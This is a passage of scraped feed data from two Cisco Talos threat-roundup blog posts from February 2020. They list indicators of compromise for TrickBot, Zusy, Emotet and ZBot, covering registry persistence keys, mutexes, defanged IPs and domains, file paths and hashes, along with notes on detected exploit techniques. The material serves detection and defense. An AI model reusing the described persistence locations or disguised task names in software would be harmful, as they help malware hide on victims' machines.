Win.Dropper.TrickBot-7577793-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 3 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\75E0ABB6138512271C04F85FDDDE38E4B7242EFE \nValue Name: Blob ` | 2 \nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 47 \n`Global\\785161C887210` | 44 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`216[.]239[.]32[.]21` | 4 \n`216[.]239[.]34[.]21` | 4 \n`176[.]58[.]123[.]25` | 3 \n`216[.]239[.]36[.]21` | 4 \n`216[.]239[.]38[.]21` | 3 \n`104[.]20[.]17[.]242` | 2 \n`116[.]203[.]16[.]95` | 2 \n`104[.]20[.]16[.]242` | 2 \n`190[.]214[.]13[.]2` | 28 \n`181[.]113[.]28[.]146` | 7 \n`181[.]140[.]173[.]186` | 24 \n`45[.]125[.]1[.]34` | 5 \n`52[.]206[.]178[.]1` | 1 \n`54[.]235[.]220[.]229` | 2 \n`54[.]235[.]203[.]7` | 1 \n`198[.]8[.]91[.]10` | 7 \n`82[.]146[.]62[.]52` | 8 \n`5[.]182[.]210[.]246` | 6 \n`5[.]182[.]210[.]226` | 4 \n`34[.]198[.]132[.]204` | 1 \n`51[.]89[.]115[.]116` | 5 \n`85[.]204[.]116[.]237` | 10 \n`93[.]189[.]42[.]146` | 3 \n`194[.]87[.]238[.]87` | 3 \n`146[.]185[.]253[.]18` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]myexternalip[.]com` | 2 \n`ident[.]me` | 3 \n`myexternalip[.]com` | 6 \n`icanhazip[.]com` | 4 \n`ip[.]anysrc[.]net` | 2 \n`api[.]ip[.]sb` | 5 \n`ipecho[.]net` | 4 \n`checkip[.]amazonaws[.]com` | 3 \n`wtfismyip[.]com` | 1 \n`api[.]ipify[.]org` | 4 \n`ipinfo[.]io` | 5 \n`252[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 32 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\windirect` | 8 \n`%APPDATA%\\windirect\\settings.ini` | 8 \n`%System32%\\Tasks\\Windows .Net library core` | 39 \n`%APPDATA%\\netwinlib` | 39 \n`%APPDATA%\\netwinlib\\data` | 39 \n`%APPDATA%\\netwinlib\\settings.ini` | 39 \n`%SystemRoot%\\Tasks\\Windows .Net library core.job` | 25 \n`%APPDATA%\\windirect\\data` | 8 \n`%System32%\\Tasks\\Windows Direct core tools` | 8 \n`%SystemRoot%\\Tasks\\Windows Direct core tools.job` | 8 \n`%APPDATA%\\netwinlib\\88f4d8d02c72f50d136c15678cf3be9e.exe` | 1 \n`%APPDATA%\\NETWINLIB\\<original file name>.exe` | 39 \n`%APPDATA%\\WINDIRECT\\<original file name>.exe` | 8 \n \n#### File Hashes\n\n` 0a9f9afb0da70420f5b3bb0122f8a3e61cefa5e3b46ba0b22105861ccb4c4731 0bb38dd296227bd17fab03f287075d6d88979d9a7c0f2260900d6c79be113ed6 0c7358921c14cf5e27e1cc7522379f53b114ada048304389e2fcdd821437dcfa 0eefd7ae0d678d8e9426a3f2344baea842b09d9f60f23564e9ca38b36a2c7866 15a808f1d972bd04819ce062bfca15af6a3defc7434a4cd1df0d0f557f0b9244 19038675ae06629f0d1c69226d079a8bab2781c0531175e80edef91a1ce9a80d 1c8919240e4882c3bb261ebe3a58b950e155ff022816dbcb1c1647413f7ac82d 1cc919c69b243005688f45f53418b58ea990a40e8527aa273b797c58a592f6ad 228e28941d69b5f2a1dc9607e91f2313e4843fe4fe77e8d246c9121271012f19 278605aa9843e8eabd5e7cdc83de8a7eeb76c29a19bb41f88bed78f844d94425 2fea0302c8ffa171845092e26e5d22d92eacaa2f32ef8e0149c5480b39eb567b 329f07a624ed34bda1aaabe0e867016862937b6f08bcfa3ae6d2eeee266df41b 3a77c6f027d54b14417be9380c0e190302d98a437f7fde23cc878b2cf62d7832 3e37550017efa6c92c0060a8a5733f8b3d110ecee14d5f5e8be9a66d9dc09af1 43dc628e385c2b79471a052fbe8ad0a011301b5f56231c01f1a8aa0422482721 46d3e013654582412c2b81b841d0b9cb9baa049e3b8e62a447ac656173fc964a 47b5bef23c6129244b84a4774785c48daad1591d253001723279b180ec828962 54b553f3ef10badaccb9ef6dff73c4c6f29a35685694e6afa8d90643acd78791 648dd27a4affa4eb955935a1b66a72000fd2035a1c1aff4e640339534b767e00 682df81e000e3e2bfc4fbdb6b9ff7bdb6020ee6b1388ab3bc95be66bae65ae4a 6d2788dfa3f6e5a054eda08200a97664368b9874350555b65f4319088f1d2e06 7364613d95319976a837e6b5df8bbcb8a9e94125b816253ff6ab523f55c98c77 74e990e02d30c7ddfddb15d7411124e46da01d486abc0f7439559bd19e56ad12 7747552af8960acf1fc3090d1812c19dc38d8cf015846dcefd88c12dec0afc9d 7eb312b1de92aff32d189eef03650ba2b9bd710ca337bf24c2ed46dcdedcedc7 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-9KxUnXBi8Ig/Xj2lHzzHYCI/AAAAAAAADRA/xUwq2yFwUnc1d8msoO44ZTfxpAnfdQkiQCLcBGAsYHQ/s1600/c9c500924e2b2da5b8106ab4360c2b24fb7b68778c28b6d1bda9a7ee05461969_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-_hRG3vkPNKM/Xj2lLhuZbAI/AAAAAAAADRI/CuEHmwKYCS8wpSbTiMTDu-gKTGBzPVQoQCLcBGAsYHQ/s1600/c9c500924e2b2da5b8106ab4360c2b24fb7b68778c28b6d1bda9a7ee05461969_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Zusy-7572206-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 7 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: 36412 ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 1 \n`<HKCU>\\SOFTWARE\\ATLTLCN ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{V0Y3JD1E-U88T-472J-2REI-16PSTS01I841} ` | 1 \n`<HKCU>\\SOFTWARE\\ATLTLCN \nValue Name: ServerStarted ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: WmiPrv ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{V0Y3JD1E-U88T-472J-2REI-16PSTS01I841} \nValue Name: StubPath ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: WmiPrv ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: WmiPrv ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS \nValue Name: Load ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS \nValue Name: Load ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: Shell ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: Shell ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: WmiPrv ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: WmiPrv ` | 1 \n`<HKCU>\\SOFTWARE\\ATLTLCN \nValue Name: InstalledServer ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: FIXMAPI 1.0 MAPI Repair Tool ` | 1 \nMutexes | Occurrences \n---|--- \n`XTREMEUPDATE` | 1 \n`1009299684` | 6 \n`2562100796` | 6 \n`lol` | 6 \n`mjwzCaJUioOZIIF` | 2 \n`ATLtlcn` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`40[.]90[.]247[.]210` | 3 \n`40[.]91[.]124[.]111` | 2 \n`20[.]45[.]1[.]107` | 1 \n`138[.]197[.]221[.]199` | 1 \n`192[.]40[.]57[.]179` | 2 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]update[.]microsoft[.]com[.]nsatc[.]net` | 6 \n`infernushosting[.]net` | 6 \n`bighecks[.]org` | 1 \n`pen[.]is-certified[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\x.html` | 1 \n`%APPDATA%\\Update` | 1 \n`%ProgramData%\\Local Settings` | 6 \n`%ProgramData%\\Local Settings\\Temp` | 6 \n`%ProgramData%\\Local Settings\\Temp\\msuwavie.pif` | 1 \n`%ProgramData%\\Local Settings\\Temp\\msariiz.scr` | 1 \n`%ProgramData%\\Local Settings\\Temp\\msvbazez.scr` | 1 \n`%ProgramData%\\Local Settings\\Temp\\msvcais.com` | 1 \n`%APPDATA%\\Update\\Javaupdate.exe` | 1 \n`%APPDATA%\\Mining` | 1 \n`%ProgramData%\\Local Settings\\Temp\\msabomu.com` | 1 \n`%ProgramData%\\Local Settings\\Temp\\msezizyf.exe` | 1 \n`%APPDATA%\\Mining\\coin-miner.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\ATLtlcn.cfg` | 1 \n`%APPDATA%\\WmiPrv` | 1 \n`%APPDATA%\\WmiPrv\\WmiPrv.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\ATLtlcn.dat` | 1 \n`%HOMEPATH%\\Music\\fixmapi.exe` | 1 \n`%HOMEPATH%\\Music\\wdmaud.exe` | 1 \n`%TEMP%\\msaaqinu.com` | 1 \n`%TEMP%\\msitezcn.scr` | 1 \n`%TEMP%\\msavoyauu.pif` | 1 \n`%HOMEPATH%\\My Documents\\My Music\\fixmapi.exe` | 1 \n`%HOMEPATH%\\My Documents\\My Music\\wdmaud.exe` | 1 \n`%TEMP%\\msqwwu.exe` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 18226c65547a1de83f00028171b8948b5c9fb33d194afd1f3f92fa5c90fdaf45 298b5a668c186cdf8fde2dc29e38d0921734b3322fe6191dabd79a12ce3440bd 2a57280bffa1d45f7510ed16d397f568395d057f10c8de214e590f458f465682 412316ac563c1028acf3d41652c670f29e60636198a304f5e560ac87ab7b4aaa 4a8dfad4d821e5f74b9f11ff82131fd533b14d4039ab1d52164a73fe08b5f05a 66bec557cf492d9014a3be80c31d53b29bc78e98d9485ef4f78de853e194c57b a71a598119ebb1598db7857d9619b71e21a447f5aec4de74fc112d4d09b90025 ba02e51162dd1ec07a955f706d09dcfe5a860adaae0e990fe1fc3809d28c0143 bbbfdd70c93b7728b38eb826b85c70e212d9ca355347fa61f10bc6488103f650 d499aaf6b7e484b7a5bf76df7a9fef3fc48e42a107020196b9c96e8637dab8db `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-yxjdngCSJw8/Xj2leSaN6eI/AAAAAAAADRU/dtcwSs8mh30Le7FW6r6TXJ2coQA2YxPHQCLcBGAsYHQ/s1600/412316ac563c1028acf3d41652c670f29e60636198a304f5e560ac87ab7b4aaa_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-l4QCgQxNAT0/Xj2lkdvn3MI/AAAAAAAADRY/1RYbr8xuX7wJ1qWVmhYpIe8QWPyFG9f5QCLcBGAsYHQ/s1600/18226c65547a1de83f00028171b8948b5c9fb33d194afd1f3f92fa5c90fdaf45_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (5540) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nProcess hollowing detected \\- (252) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nGamarue malware detected \\- (177) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nKovter injection detected \\- (142) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nInstallcore adware detected \\- (103) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nExcessively long PowerShell command detected \\- (100) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nDealply adware detected \\- (58) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nCorebot malware detected \\- (15) \nCorebot is a Trojan with many capabilities found in other prominent families. It features a plugin system to enable it to load a variety of features from the C&amp;C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking. \nTrickbot malware detected \\- (9) \nTrickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching. \nReverse http payload detected \\- (6) \nAn exploit payload intended to connect back to an attacker controlled host using http has been detected. \n \n", "modified": "2020-02-07T11:56:39", "published": "2020-02-07T11:56:39", "id": "TALOSBLOG:CFBFA4A360F5A4B96A4245B783BAE4C2", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/PL3tiDhFn70/threat-roundup-0131-0207.html", "type": "talosblog", "title": "Threat Roundup for January 31 to February 7", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-14T21:31:51", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Feb. 7 and Feb. 14. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, [Snort.org](<https://www.snort.org/>), or [ClamAV.net](<https://www.clamav.net/>). \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2020/02/tru.json_.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness. \nThe most prevalent threats highlighted in this roundup are: \n \nThreat Name | Type | Description \n---|---|--- \nDoc.Downloader.Emotet-7580217-0 | Downloader | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Packed.ZBot-7578445-1 | Packed | Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods such as key-logging and form-grabbing. \nWin.Dropper.Trickbot-7582953-1 | Dropper | Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts. \nWin.Dropper.NetWire-7578556-0 | Dropper | NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Packed.Gamarue-7580018-0 | Packed | Gamarue, also known as Andromeda, is a botnet used to spread malware, steal information and perform activities such as click fraud. \nWin.Trojan.Kovter-7581113-1 | Trojan | Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries which store its malicious code. Kovter is capable of reinfecting a system, even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware. \nPUA.Win.Trojan.Bladabindi-7581164-0 | Trojan | njRAT, also known as Bladabindi, is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. \nWin.Packed.Ponystealer-7581286-0 | Packed | Ponystealer is known to be able to steal credentials from more than 100 different applications and may also install other malware such as a remote access tool (RAT). \nWin.Ransomware.Cerber-7582361-0 | Ransomware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension \".cerber,\" although in more recent campaigns, other file extensions are used. \n \n* * *\n\n## Threat Breakdown\n\n### Doc.Downloader.Emotet-7580217-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 20 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ImagePath ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER \nValue Name: c019706b ` | 2 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 18 \n`Global\\M98B68E3C` | 18 \n`Global\\IC019706B` | 2 \n`Global\\MC019706B` | 2 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`67[.]195[.]228[.]95` | 3 \n`157[.]7[.]107[.]4` | 4 \n`190[.]228[.]29[.]115` | 3 \n`208[.]84[.]244[.]49` | 4 \n`105[.]187[.]200[.]240` | 4 \n`23[.]227[.]38[.]32` | 3 \n`72[.]18[.]130[.]169` | 3 \n`69[.]175[.]10[.]34` | 3 \n`83[.]143[.]28[.]130` | 4 \n`5[.]2[.]81[.]171` | 3 \n`41[.]191[.]232[.]22` | 4 \n`23[.]21[.]177[.]74` | 3 \n`89[.]97[.]236[.]171` | 3 \n`190[.]196[.]217[.]50` | 3 \n`195[.]57[.]58[.]70` | 4 \n`206[.]183[.]111[.]62` | 3 \n`192[.]185[.]181[.]168` | 4 \n`77[.]88[.]21[.]158` | 4 \n`87[.]250[.]255[.]212` | 3 \n`46[.]28[.]106[.]9` | 3 \n`77[.]88[.]21[.]37` | 3 \n`83[.]143[.]24[.]50` | 4 \n`86[.]96[.]229[.]28/31` | 3 \n`74[.]208[.]5[.]14/31` | 3 \n`173[.]194[.]204[.]108/31` | 4 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`smtp[.]outlook[.]com` | 3 \n`mail[.]outlook[.]com` | 3 \n`smtp[.]secureserver[.]net` | 4 \n`mailv[.]emirates[.]net[.]ae` | 3 \n`pop-mail[.]outlook[.]com` | 3 \n`pop[.]secureserver[.]net` | 3 \n`mail[.]secureserver[.]net` | 3 \n`secure[.]emailsrvr[.]com` | 3 \n`pop[.]yandex[.]com[.]tr` | 3 \n`smtp-mail[.]outlook[.]com` | 3 \n`outlook[.]office365[.]com` | 3 \n`mail[.]telkomsa[.]net` | 4 \n`smtp[.]yandex[.]com[.]tr` | 4 \n`mail[.]yandex[.]com` | 3 \n`mail[.]municipiodeyaguachi[.]gob[.]ec` | 3 \n`pop[.]vbn[.]co[.]bw` | 4 \n`mail[.]in[.]cpm-int[.]com` | 3 \n`mail[.]siajewellery[.]com` | 3 \n`mail[.]firstgourmet[.]com` | 3 \n`mail[.]lolipop[.]jp` | 3 \n`pop3[.]lolipop[.]jp` | 3 \n`mail[.]doves[.]co[.]za` | 3 \n`mail[.]vbn[.]co[.]bw` | 4 \n`smtp[.]vbn[.]co[.]bw` | 3 \n`mail[.]domverconsultants[.]com` | 3 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\298.exe` | 20 \n`%SystemRoot%\\SysWOW64\\AppIdPolicyEngineApi` | 1 \n`%SystemRoot%\\SysWOW64\\msctf` | 1 \n`%SystemRoot%\\SysWOW64\\cipher` | 1 \n`%SystemRoot%\\SysWOW64\\msftedit` | 1 \n`%SystemRoot%\\SysWOW64\\iprtrmgr` | 1 \n`%SystemRoot%\\SysWOW64\\xpsservices` | 1 \n`%SystemRoot%\\SysWOW64\\uexfat` | 1 \n`%ProgramData%\\UmCbkT.exe` | 1 \n`%SystemRoot%\\SysWOW64\\dhcpcmonitor` | 1 \n`%SystemRoot%\\SysWOW64\\psbase` | 1 \n`%SystemRoot%\\SysWOW64\\f3ahvoas` | 1 \n`%SystemRoot%\\SysWOW64\\XpsRasterService` | 1 \n`%SystemRoot%\\SysWOW64\\NlsData0414` | 1 \n`%SystemRoot%\\SysWOW64\\rnr20` | 1 \n`%SystemRoot%\\SysWOW64\\KBDIULAT` | 1 \n`%SystemRoot%\\SysWOW64\\KBDHE` | 1 \n`%TEMP%\\1A19.tmp` | 1 \n`%SystemRoot%\\SysWOW64\\dhcpcore` | 1 \n`%TEMP%\\2D63.tmp` | 1 \n`%SystemRoot%\\SysWOW64\\mydocs` | 1 \n`%SystemRoot%\\SysWOW64\\wininet` | 1 \n`%SystemRoot%\\SysWOW64\\twinui` | 1 \n`%SystemRoot%\\SysWOW64\\ureg` | 1 \n \n#### File Hashes\n\n` 0031f41b3edde21592bc42365e01689f23a73a634d7c8ffc0807e60e1a189a38 006766d9879f75d74de2c385ce8418fb838989af2046d8d329ad6ae7dc6d26eb 00efa3f945cfd76037639b91f2fd9208525eb377235440544c29e2c0d93a1c19 012b10d254c825b01bb0ae5f604bc59de7c0cac54bdd17b7f7dcd3e63ce89c66 024b77f2ff26f37e132e450a1d9a04fb94be78ecb0459afc5a09638efbec7cc5 02f55988f95d388efd2da064560eb349eab243dfc8eb806273850d707d74cb07 05c41c7550b30e8074e29985b3d4a75c209156334b93647f1e5d56a77cffc4f2 06a35e532b1e957c8fc2d44c2c370769fcc829479d90cb342b59dd7be17f58a1 0b1c60e5511737fbed55e9ce90163e111d882ae5db69008c010e5cb42e79d81b 0b878e218014a87bc4674a3f8c7113b207cf3e3203ba565c9e3fcf62cb5f18d6 0d45faaf1c2a3cd60340c2d9436fa60571f024ce17cb29089a538b3294aa8a3f 15d9234eeea6f729bd2a36b17e5cc5de58baa05a3ce2258675dd2620e4c28fb1 18195f809af26a3950879186304039c5592a8514671bb32cd6d45d7bf3014e4a 18c98bca74464c6bbe992bcffa838b6224e42419eac19e69ca0da0514968ccd6 18d15aa6b4831299695ceb06dd8ad7398dc48729314ecc0219a75833cc693dd4 196e94c02598dfcfaaf2b62c410c7d64eea908cc19c3af922277e2f1c5f3320f 19c05a961a7babe4bf5ef5889e358ba0df4b790a0b73544d5961bfef2e7d3451 1e0452e2654c5fb4bd01ce92783004202dbc022604b52c54c81f93147005a6f1 21739583fe20050c9ea0aab5c23843a68b3d000a658b72f3148a98e4c0ba330d 2576c16870fedf186a782acae71056a381f01efbdd0c7df30a36daf526072368 26c3ffa34af8692430389b2132228ac0ad44b4a9cb2cf0a3c736468bf1ad1c1e 294233e4170042ad9ca33b8e5a227fc3e4033be090a25953a2d0e013f06e0a52 31522d4b3a684be27b58cddf1bf17be3f5cb34d5fc6fac0baba7b5d1aaf28e73 37cc6b1c356b5e15dd0fffc7ca4b58c760f02795ed47cff09e0b314951337a99 380fed9a967852beba37e632a51fce2a08f1c8b3b48330851a1fd40ac6dd1b84 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Kr_lhWjsnHc/XkbZhu7QZPI/AAAAAAAADRo/vKTi-82YNVQGvQD9whr9pi0XdMYh4TavACLcBGAsYHQ/s1600/1e0452e2654c5fb4bd01ce92783004202dbc022604b52c54c81f93147005a6f1_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-bs4E2rUzd_U/XkbjlVL9wHI/AAAAAAAADR0/fHbhDuyvOKgxS0kzjFLPEToFz2W8BPmmQCLcBGAsYHQ/s1600/929d633b1ce45a623bf4090c7fc7de3a9b4ef32febcbb4b2c1e4b3589a965538_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-j5fItW8khQM/XkbjrikkxzI/AAAAAAAADR4/vZs3fBvwVlEkaC5oFvNBAJLNQpb3RIsqQCLcBGAsYHQ/s1600/0d52884323396c99de2994a867ebe7ccb325a7a33a6ae3317f4290517232a3ed_umbrella.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-iVZ0T5_U8iQ/XkbjyoFCH7I/AAAAAAAADR8/4P6m7lf034MouuYEH9GdYx30SXlc81-TgCLcBGAsYHQ/s1600/0b1c60e5511737fbed55e9ce90163e111d882ae5db69008c010e5cb42e79d81b_malware.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.ZBot-7578445-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS \nValue Name: LoadAppInit_DLLs ` | 25 